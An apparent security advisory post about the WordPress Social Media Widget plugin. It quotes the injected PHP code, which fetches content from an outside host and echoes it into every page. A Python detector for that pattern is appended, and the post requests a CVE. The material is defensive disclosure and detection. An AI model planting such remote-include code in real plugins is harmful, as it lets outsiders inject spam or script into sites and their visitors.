http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:

    $smw_url = "hxxp://i.aaur.net/i.php";
    if(!function_exists("smw_get")){
        function smw_get($f) {
            $response = wp_remote_get( $f );
            if( is_wp_error( $response ) ) {
                function smw_get_body($f) {
                    $ch = @curl_init();
                    @curl_setopt($ch, CURLOPT_URL, $f);
                    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    $output = @curl_exec($ch);
                    @curl_close($ch);
                    return $output;
                }
                echo smw_get_body($f);
            } else {
                echo $response["body"];
            }
        }
        smw_get($smw_url);
    }

Regardless of HOW this code got into the plugin, it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms: anyone who can
man-in-the-middle your server can now inject PHP into your blog, or
anything sent to the clients, etc.

Please use CVE-2013-1949 for this issue.
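
A defensive check for the pattern in the quoted snippet, added here as an example and not part of the original post or the plugin: a line-based Python heuristic that flags PHP echo/print statements whose value comes from wp_remote_get() or curl_exec(), directly or through a helper function. The name find_remote_echo and the SAMPLE string (the post's snippet, abridged, URL left defanged) are assumptions of this example.

```python
import re

# Line-based heuristic (no PHP parser, no scope tracking): expect false negatives.
FETCH = re.compile(r'\b(?:wp_remote_get|wp_remote_post|wp_remote_request|curl_exec)\s*\(')
ASSIGN = re.compile(r'(\$\w+)\s*=(?!=)\s*(.+?);')
FUNC = re.compile(r'\bfunction\s+(\w+)\s*\(')
RETURN = re.compile(r'\breturn\s+(.+?);')
ECHO = re.compile(r'\b(?:echo|print)\s+(.+?);')

def find_remote_echo(php_source):
    """Return (line_no, statement) for each echo/print of remotely fetched data."""
    lines = php_source.splitlines()
    tainted_vars, tainted_funcs = set(), set()
    def tainted(expr):
        return bool(FETCH.search(expr)
            or any(re.search(re.escape(v) + r'\b', expr) for v in tainted_vars)
            or any(re.search(r'\b' + f + r'\s*\(', expr) for f in tainted_funcs))
    size = -1
    while size != len(tainted_vars) + len(tainted_funcs):  # repeat until stable
        size, current = len(tainted_vars) + len(tainted_funcs), None
        for line in lines:
            if m := FUNC.search(line):
                current = m.group(1)  # most recent function declaration seen
            if (m := ASSIGN.search(line)) and tainted(m.group(2)):
                tainted_vars.add(m.group(1))  # variable holds fetched data
            if (m := RETURN.search(line)) and current and tainted(m.group(1)):
                tainted_funcs.add(current)  # function returns fetched data
    return [(n, l.strip()) for n, l in enumerate(lines, 1)
            if (m := ECHO.search(l)) and tainted(m.group(1))]

# Sample input: the snippet quoted in the post, abridged (URL left defanged).
SAMPLE = '''$smw_url = "hxxp://i.aaur.net/i.php";
function smw_get($f) {
$response = wp_remote_get( $f );
if( is_wp_error( $response ) ) {
function smw_get_body($f) {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $f);
$output = @curl_exec($ch);
return $output;
}
echo smw_get_body($f);
} else {
echo $response["body"];
}
}
smw_get($smw_url);'''

if __name__ == "__main__":
    print(find_remote_echo(SAMPLE))
```

A hit is a prompt for manual review of the plugin file, not proof of compromise; legitimate plugins also render remote content, though they should escape it first.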